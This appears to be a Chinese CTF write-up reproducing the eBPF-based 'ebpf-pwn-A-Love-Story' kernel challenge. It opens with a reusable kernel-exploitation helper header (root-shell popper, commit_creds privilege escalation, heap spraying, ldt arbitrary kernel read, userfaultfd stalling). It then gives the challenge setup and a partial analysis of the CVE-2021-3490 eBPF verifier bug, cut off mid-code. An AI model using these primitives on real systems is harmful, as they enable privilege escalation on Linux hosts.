976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
/**
* @file kernel.h
* @author arttnba3 (arttnba@gmail.com)
* @brief arttnba3's personal utils for kernel pwn
* @version 1.1
* @date 2023-05-20
*
* @copyright Copyright (c) 2023 arttnba3
*
*/
#ifndef A3_KERNEL_PWN_H
#define A3_KERNEL_PWN_H

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <sys/types.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>

/**
* I - fundamental functions
* e.g. CPU-core binder, user-status saver, etc.
*/

size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
size_t init_task, init_nsproxy, init_cred;

size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
size_t page_count;

page_count = ((direct_map_addr & (~0xfff)) - page_offset_base) / 0x1000;

return vmemmap_base + page_count * 0x40;
}

int print_hex(void *p, int size){
int i;
unsigned char *buf = (unsigned char *)p;

if(size % sizeof(void *))
{
return 1;
}
printf("--------------------------------------------------------------------------------\n");
for (i = 0; i < size; i += sizeof(void *)){
printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%lx\n",
i, buf[i+0], buf[i+1], buf[i+2], buf[i+3], buf[i+4], buf[i+5], buf[i+6], buf[i+7], *(unsigned long*)&buf[i]);
}
return 0;
}

void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}

/* root checker and shell poper */
void get_root_shell(void)
{
puts("[*] Checking for root...");

if(getuid()) {
puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
sleep(5);
exit(EXIT_FAILURE);
}

puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

system("/bin/sh");

/* to exit the process normally, instead of segmentation fault */
exit(EXIT_SUCCESS);
}

/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
asm volatile (
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/* bind the process to specific core */
void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/* for ret2usr attacker */
void get_root_privilige(size_t prepare_kernel_cred, size_t commit_creds)
{
void *(*prepare_kernel_cred_ptr)(void *) =
(void *(*)(void*)) prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = (int (*)(void*)) commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}

/**
* @brief create an isolate namespace
* note that the caller **SHOULD NOT** be used to get the root, but an operator
* to perform basic exploiting operations in it only
*/
void unshare_setup(void)
{
char edit[0x100];
int tmp_fd;

unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}

/**
* II - fundamental kernel structures
* e.g. list_head
*/
struct list_head {
uint64_t next;
uint64_t prev;
};

/**
* III - pgv pages sprayer related
* not that we should create two process:
* - the parent is the one to send cmd and get root
* - the child creates an isolate userspace by calling unshare_setup(),
* receiving cmd from parent and operates it only
*/
#define PGV_PAGE_NUM 1000
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

/* each allocation is (size * nr) bytes, aligned to PAGE_SIZE */
struct pgv_page_request {
int idx;
int cmd;
unsigned int size;
unsigned int nr;
};

/* operations type */
enum {
CMD_ALLOC_PAGE,
CMD_FREE_PAGE,
CMD_EXIT,
};

/* pipe for cmd communication */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/* create a socket and alloc pages, return the socket fd */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
/* tpacket version for setsockopt */
struct tpacket_req req;
int socket_fd, version;
int ret;

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
ret = socket_fd;
goto err_out;
}

version = TPACKET_V1;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_VERSION)\n");
goto err_setsockopt;
}

memset(&req, 0, sizeof(req));
req.tp_block_size = size;
req.tp_block_nr = nr;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
goto err_setsockopt;
}

return socket_fd;

err_setsockopt:
close(socket_fd);
err_out:
return ret;
}

int packet_socket_setup(uint32_t block_size, uint32_t frame_size,
uint32_t block_nr, uint32_t sizeof_priv, int timeout) {
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0)
{
perror("[-] socket (AF_PACKET)");
exit(1);
}

int v = TPACKET_V3;
int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
if (rv < 0)
{
perror("[-] setsockopt (PACKET_VERSION)");
exit(1);
}

struct tpacket_req3 req3;
memset(&req3, 0, sizeof(req3));
req3.tp_sizeof_priv = sizeof_priv;
req3.tp_block_nr = block_nr;
req3.tp_block_size = block_size;
req3.tp_frame_size = frame_size;
req3.tp_frame_nr = (block_size * block_nr) / frame_size;
req3.tp_retire_blk_tov = timeout;
req3.tp_feature_req_word = 0;

rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (rv < 0)
{
perror("[-] setsockopt (PACKET_RX_RING)");
exit(1);
}

struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_family = PF_PACKET;
sa.sll_protocol = htons(ETH_P_ALL);
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_hatype = 0;
sa.sll_halen = 0;
sa.sll_pkttype = 0;
sa.sll_halen = 0;

rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
if (rv < 0)
{
perror("[-] bind (AF_PACKET)");
exit(1);
}

return s;
}

/* the parent process should call it to send command of allocation to child */
int alloc_page(int idx, unsigned int size, unsigned int nr)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = CMD_ALLOC_PAGE,
.size = size,
.nr = nr,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

/* the parent process should call it to send command of freeing to child */
int free_page(int idx)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = CMD_FREE_PAGE,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(req));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

/* the child, handler for commands from the pipe */
void spray_cmd_handler(void)
{
struct pgv_page_request req;
int socket_fd[PGV_PAGE_NUM];
int ret;

/* create an isolate namespace*/
unshare_setup();

/* handler request */
do {
read(cmd_pipe_req[0], &req, sizeof(req));

if (req.cmd == CMD_ALLOC_PAGE) {
ret = create_socket_and_alloc_pages(req.size, req.nr);
socket_fd[req.idx] = ret;
} else if (req.cmd == CMD_FREE_PAGE) {
ret = close(socket_fd[req.idx]);
} else {
printf("[x] invalid request: %d\n", req.cmd);
}

write(cmd_pipe_reply[1], &ret, sizeof(ret));
} while (req.cmd != CMD_EXIT);
}

/* init pgv-exploit subsystem :) */
void prepare_pgv_system(void)
{
/* pipe for pgv */
pipe(cmd_pipe_req);
pipe(cmd_pipe_reply);

/* child process for pages spray */
if (!fork()) {
spray_cmd_handler();
}
}

/**
* IV - keyctl related
*/

/**
* The MUSL also doesn't contain `keyctl.h` :(
* Luckily we just need a bit of micros in exploitation,
* so just define them directly is okay :)
*/

#define KEY_SPEC_PROCESS_KEYRING -2 /* - key ID for process-specific keyring */
#define KEYCTL_UPDATE 2 /* update a key */
#define KEYCTL_REVOKE 3 /* revoke a key */
#define KEYCTL_UNLINK 9 /* unlink a key from a keyring */
#define KEYCTL_READ 11 /* read a key or keyring's contents */

int key_alloc(char *description, void *payload, size_t plen)
{
return syscall(__NR_add_key, "user", description, payload, plen,
KEY_SPEC_PROCESS_KEYRING);
}

int key_update(int keyid, void *payload, size_t plen)
{
return syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);
}

int key_read(int keyid, void *buffer, size_t buflen)
{
return syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);
}

int key_revoke(int keyid)
{
return syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);
}

int key_unlink(int keyid)
{
return syscall(__NR_keyctl, KEYCTL_UNLINK, keyid, KEY_SPEC_PROCESS_KEYRING);
}

/**
* V - sk_buff spraying related
* note that the sk_buff's tail is with a 320-bytes skb_shared_info
*/
#define SOCKET_NUM 8
#define SK_BUFF_NUM 128

/**
* socket's definition should be like:
* int sk_sockets[SOCKET_NUM][2];
*/

int init_socket_array(int sk_socket[SOCKET_NUM][2])
{
/* socket pairs to spray sk_buff */
for (int i = 0; i < SOCKET_NUM; i++) {
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket[i]) < 0) {
printf("[x] failed to create no.%d socket pair!\n", i);
return -1;
}
}

return 0;
}

int spray_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (write(sk_socket[i][0], buf, size) < 0) {
printf("[x] failed to spray %d sk_buff for %d socket!", j, i);
return -1;
}
}
}

return 0;
}

int free_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (read(sk_socket[i][1], buf, size) < 0) {
puts("[x] failed to received sk_buff!");
return -1;
}
}
}

return 0;
}

/**
* VI - msg_msg related
*/

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

struct msg_msg {
struct list_head m_list;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
};

struct msg_msgseg {
uint64_t next;
};

/*
struct msgbuf {
long mtype;
char mtext[0];
};
*/

int get_msg_queue(void)
{
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

ssize_t read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
* the msgp should be a pointer to the `struct msgbuf`,
* and the data should be stored in msgbuf.mtext
*/
ssize_t write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
((struct msgbuf*)msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
ssize_t peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp,
MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security)
{
msg->m_list.next = m_list_next;
msg->m_list.prev = m_list_prev;
msg->m_type = m_type;
msg->m_ts = m_ts;
msg->next = next;
msg->security = security;
}

/**
* VII - ldt_struct related
*/

/**
* Somethings we may want to compile the exp binary with MUSL-GCC, which
* doesn't contain the `asm/ldt.h` file.
* As the file is small, I copy that directly to here :)
*/

/* Maximum number of LDT entries supported. */
#define LDT_ENTRIES 8192
/* The size of each LDT entry. */
#define LDT_ENTRY_SIZE 8

#ifndef __ASSEMBLY__
/*
* Note on 64bit base and limit is ignored and you cannot set DS/ES/CS
* not to the default values if you still want to do syscalls. This
* call is more for 32bit mode therefore.
*/
struct user_desc {
unsigned int entry_number;
unsigned int base_addr;
unsigned int limit;
unsigned int seg_32bit:1;
unsigned int contents:2;
unsigned int read_exec_only:1;
unsigned int limit_in_pages:1;
unsigned int seg_not_present:1;
unsigned int useable:1;
#ifdef __x86_64__
/*
* Because this bit is not present in 32-bit user code, user
* programs can pass uninitialized values here. Therefore, in
* any context in which a user_desc comes from a 32-bit program,
* the kernel must act as though lm == 0, regardless of the
* actual value.
*/
unsigned int lm:1;
#endif
};

#define MODIFY_LDT_CONTENTS_DATA 0
#define MODIFY_LDT_CONTENTS_STACK 1
#define MODIFY_LDT_CONTENTS_CODE 2

#endif /* !__ASSEMBLY__ */

/* this should be referred to your kernel */
#define SECONDARY_STARTUP_64 0xffffffff81000060

/* desc initializer */
static inline void init_desc(struct user_desc *desc)
{
/* init descriptor info */
desc->base_addr = 0xff0000;
desc->entry_number = 0x8000 / 8;
desc->limit = 0;
desc->seg_32bit = 0;
desc->contents = 0;
desc->limit_in_pages = 0;
desc->lm = 0;
desc->read_exec_only = 0;
desc->seg_not_present = 0;
desc->useable = 0;
}

/**
* @brief burte-force hitting page_offset_base by modifying ldt_struct
*
* @param ldt_cracker function to make the ldt_struct modifiable
* @param cracker_args args of ldt_cracker
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param burte_size size of each burte-force hitting
* @return size_t address of page_offset_base
*/
size_t ldt_guessing_direct_mapping_area(void *(*ldt_cracker)(void*),
void *cracker_args,
void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args,
uint64_t burte_size)
{
struct user_desc desc;
uint64_t page_offset_base = 0xffff888000000000;
uint64_t temp;
char *buf;
int retval;

/* init descriptor info */
init_desc(&desc);

/* make the ldt_struct modifiable */
ldt_cracker(cracker_args);
syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));

/* leak kernel direct mapping area by modify_ldt() */
while(1) {
ldt_momdifier(momdifier_args, page_offset_base);
retval = syscall(SYS_modify_ldt, 0, &temp, 8);
if (retval > 0) {
break;
}
else if (retval == 0) {
printf("[x] no mm->context.ldt!");
page_offset_base = -1;
break;
}
page_offset_base += burte_size;
}

return page_offset_base;
}

/**
* @brief read the contents from a specific kernel memory.
* Note that we should call ldtGuessingDirectMappingArea() firstly,
* and the function should be used in that caller process
*
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param addr address of kernel memory to read
* @param res_buf buf to be written the data from kernel memory
*/
void ldt_arbitrary_read(void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args, size_t addr, char *res_buf)
{
static char buf[0x8000];
struct user_desc desc;
uint64_t temp;
int pipe_fd[2];

/* init descriptor info */
init_desc(&desc);

/* modify the ldt_struct->entries to addr */
ldt_momdifier(momdifier_args, addr);

/* read data by the child process */
pipe(pipe_fd);
if (!fork()) {
/* child */
syscall(SYS_modify_ldt, 0, buf, 0x8000);
write(pipe_fd[1], buf, 0x8000);
exit(0);
} else {
/* parent */
wait(NULL);
read(pipe_fd[0], res_buf, 0x8000);
}

close(pipe_fd[0]);
close(pipe_fd[1]);
}

/**
* @brief seek specific content in the memory.
* Note that we should call ldtGuessingDirectMappingArea() firstly,
* and the function should be used in that caller process
*
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param page_offset_base the page_offset_base we leakked before
* @param mem_finder your own function to search on a 0x8000-bytes buf.
* It should be like `size_t func(void *args, char *buf)` and the `buf`
* is where we store the data from kernel in ldt_seeking_memory().
* The return val should be the offset of the `buf`, `-1` for failure
* @param finder_args your own function's args
* @return size_t kernel addr of content to find, -1 for failure
*/
size_t ldt_seeking_memory(void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args, uint64_t page_offset_base,
size_t (*mem_finder)(void*, char *), void *finder_args)
{
static char buf[0x8000];
size_t search_addr, result_addr = -1, offset;

search_addr = page_offset_base;

while (1) {
ldt_arbitrary_read(ldt_momdifier, momdifier_args, search_addr, buf);

offset = mem_finder(finder_args, buf);
if (offset != -1) {
result_addr = search_addr + offset;
break;
}

search_addr += 0x8000;
}

return result_addr;
}

/**
* VIII - userfaultfd related code
*/

/**
* The MUSL also doesn't contain `userfaultfd.h` :(
* Luckily we just need a bit of micros in exploitation,
* so just define them directly is okay :)
*/

#define UFFD_API ((uint64_t)0xAA)
#define _UFFDIO_REGISTER (0x00)
#define _UFFDIO_COPY (0x03)
#define _UFFDIO_API (0x3F)

/* userfaultfd ioctl ids */
#define UFFDIO 0xAA
#define UFFDIO_API _IOWR(UFFDIO, _UFFDIO_API, \
struct uffdio_api)
#define UFFDIO_REGISTER _IOWR(UFFDIO, _UFFDIO_REGISTER, \
struct uffdio_register)
#define UFFDIO_COPY _IOWR(UFFDIO, _UFFDIO_COPY, \
struct uffdio_copy)

/* read() structure */
struct uffd_msg {
uint8_t event;

uint8_t reserved1;
uint16_t reserved2;
uint32_t reserved3;

union {
struct {
uint64_t flags;
uint64_t address;
union {
uint32_t ptid;
} feat;
} pagefault;

struct {
uint32_t ufd;
} fork;

struct {
uint64_t from;
uint64_t to;
uint64_t len;
} remap;

struct {
uint64_t start;
uint64_t end;
} remove;

struct {
/* unused reserved fields */
uint64_t reserved1;
uint64_t reserved2;
uint64_t reserved3;
} reserved;
} arg;
} __attribute__((packed));

#define UFFD_EVENT_PAGEFAULT 0x12

struct uffdio_api {
uint64_t api;
uint64_t features;
uint64_t ioctls;
};

struct uffdio_range {
uint64_t start;
uint64_t len;
};

struct uffdio_register {
struct uffdio_range range;
#define UFFDIO_REGISTER_MODE_MISSING ((uint64_t)1<<0)
#define UFFDIO_REGISTER_MODE_WP ((uint64_t)1<<1)
uint64_t mode;
uint64_t ioctls;
};


struct uffdio_copy {
uint64_t dst;
uint64_t src;
uint64_t len;
#define UFFDIO_COPY_MODE_DONTWAKE ((uint64_t)1<<0)
uint64_t mode;
int64_t copy;
};

//#include <linux/userfaultfd.h>

char temp_page_for_stuck[0x1000];

void register_userfaultfd(pthread_t *monitor_thread, void *addr,
unsigned long len, void *(*handler)(void*))
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;

/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1) {
err_exit("userfaultfd");
}

uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
err_exit("ioctl-UFFDIO_API");
}

uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
err_exit("ioctl-UFFDIO_REGISTER");
}

s = pthread_create(monitor_thread, NULL, handler, (void *) uffd);
if (s != 0) {
err_exit("pthread_create");
}
}

void *uffd_handler_for_stucking_thread(void *args)
{
struct uffd_msg msg;
int fault_cnt = 0;
long uffd;

struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long) args;

for (;;) {
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);

if (nready == -1) {
err_exit("poll");
}

nread = read(uffd, &msg, sizeof(msg));

/* just stuck there is okay... */
sleep(100000000);

if (nread == 0) {
err_exit("EOF on userfaultfd!\n");
}

if (nread == -1) {
err_exit("read");
}

if (msg.event != UFFD_EVENT_PAGEFAULT) {
err_exit("Unexpected event on userfaultfd\n");
}

uffdio_copy.src = (unsigned long long) temp_page_for_stuck;
uffdio_copy.dst = (unsigned long long) msg.arg.pagefault.address &
~(0x1000 - 1);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
err_exit("ioctl-UFFDIO_COPY");
}

return NULL;
}
}

void register_userfaultfd_for_thread_stucking(pthread_t *monitor_thread,
void *buf, unsigned long len)
{
register_userfaultfd(monitor_thread, buf, len,
uffd_handler_for_stucking_thread);
}


/**
* IX - kernel structures
*/

struct file;
struct file_operations;
struct tty_struct;
struct tty_driver;
struct serial_icounter_struct;
struct ktermios;
struct termiox;
struct seq_operations;

struct seq_file {
char *buf;
size_t size;
size_t from;
size_t count;
size_t pad_until;
loff_t index;
loff_t read_pos;
uint64_t lock[4]; //struct mutex lock;
const struct seq_operations *op;
int poll_event;
const struct file *file;
void *private;
};

struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};

struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
int (*write_room)(struct tty_struct *tty);
int (*chars_in_buffer)(struct tty_struct *tty);
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
const struct file_operations *proc_fops;
};

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

#endif

ebpf-pwn-A-Love-Story 复现

1
2
/ $ cat /proc/version 
Linux version 5.11.16 (arttnba3@ubuntu) (gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.3
1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-initrd ./rootfs.cpio \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 kaslr pti=on quiet oops=panic panic=1" \
-no-reboot
  • smep,smap,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/bin/sh

mount -t proc proc /proc
mount -t tmpfs none /tmp
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig lo 127.0.0.1 netmask 255.255.255.0
route add -net 127.0.0.0 netmask 255.255.255.0 lo
echo "flag{yhellow}" > /flag
chmod 666 /flag

setsid /bin/cttyhack setuidgid 0 /bin/sh
echo 'sh end!\n'
#poweroff -d 1800000 -f &
umount /proc
umount /sys

poweroff -f

下载 5.11.16 的内核源码:Index of /pub/linux/kernel/v5.x/

漏洞分析

本题目没有内核模块,漏洞点为 CVE-2021-3490:

  • CVE-2021-3490 是一个发生在 eBPF verifier 中的漏洞,由于 eBPF verifier 在校验位运算操作( 与、或、异或 )时没有正确地更新寄存器的 32 位边界,从而导致攻击者可以构造出非法的运行时寄存器值以进行提权

在 eBPF 对寄存器计算的指令中,分为64位和32位操作两部分

  • 64位指令会对寄存器的64位全部进行操作
  • 32位指令只会对寄存器的低32位进行操作

eBPF 程序的安全主要是由 verifier 保证的,verifier 会模拟执行每一条指令并验证寄存器的值是否合法,主要关注这几个字段:

  • smin_valuesmax_value:64 位有符号的值的可能取值边界
  • umin_valueumax_value:64 位无符号的值的可能取值边界
  • s32_min_values32_max_value:32 位有符号的值的可能取值边界
  • u32_min_valueu32_max_value:32 位无符号的值的可能取值边界

其中,这个寄存器中具体的值,会用如下结构体进行表示:

1
2
3
4
struct tnum {
u64 value;
u64 mask;
};
  • value & mask 表示这个寄存器中可以确定的值

用于检测指令合法性的函数为 do_check,该函数会遍历每一条指令并根据指令的不同类型进行不同操作,对于算术指令(BPF_ALU / BPF_ALU64)而言有如下调用链(模拟通过后才能正常加载)

1
2
3
4
do_check()        					// 遍历每一条指令并根据类型调用相应函数处理
->check_alu_op() // 根据算术指令的opcode进行不同处理
->adjust_reg_min_max_vals() // 计算新的寄存器边界值
->adjust_scalar_min_max_vals() // 根据opcode计算具体的新边界值

首先分析调整标量数据范围的 adjust_scalar_min_max_vals 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
struct bpf_insn *insn,
struct bpf_reg_state *dst_reg,
struct bpf_reg_state src_reg)
{

......

switch (opcode) {

......

case BPF_AND:
dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_and(dst_reg, &src_reg); /* 处理32位(漏洞函数) */
scalar_min_max_and(dst_reg, &src_reg); /* 处理64位 */
break;
case BPF_OR:
dst_reg->var_off = tnum_or(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_or(dst_reg, &src_reg);
scalar_min_max_or(dst_reg, &src_reg);
break;
case BPF_XOR:
dst_reg->var_off = tnum_xor(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_xor(dst_reg, &src_reg);
scalar_min_max_xor(dst_reg, &src_reg);
break;

......

default:
mark_reg_unknown(env, regs, insn->dst_reg);
break;
}

if (alu32)
zext_32_to_64(dst_reg);

__update_reg_bounds(dst_reg); /* 对比寄存器的var_off并更新边界值 */
__reg_deduce_bounds(dst_reg); /* 边界调整校验 */
__reg_bound_offset(dst_reg); /* 基于边界值范围重新计算var_off的值 */
return 0;
}

cve 的漏洞点位于函数 scalar32_min_max_and,其中的 BPF_AND \ BPF_OR \ BPF_XOR 三类操作有问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
/* 判断是否能确定src_reg和dst_reg两个寄存器低32位的值(是否为'0') */
bool src_known = tnum_subreg_is_const(src_reg->var_off);
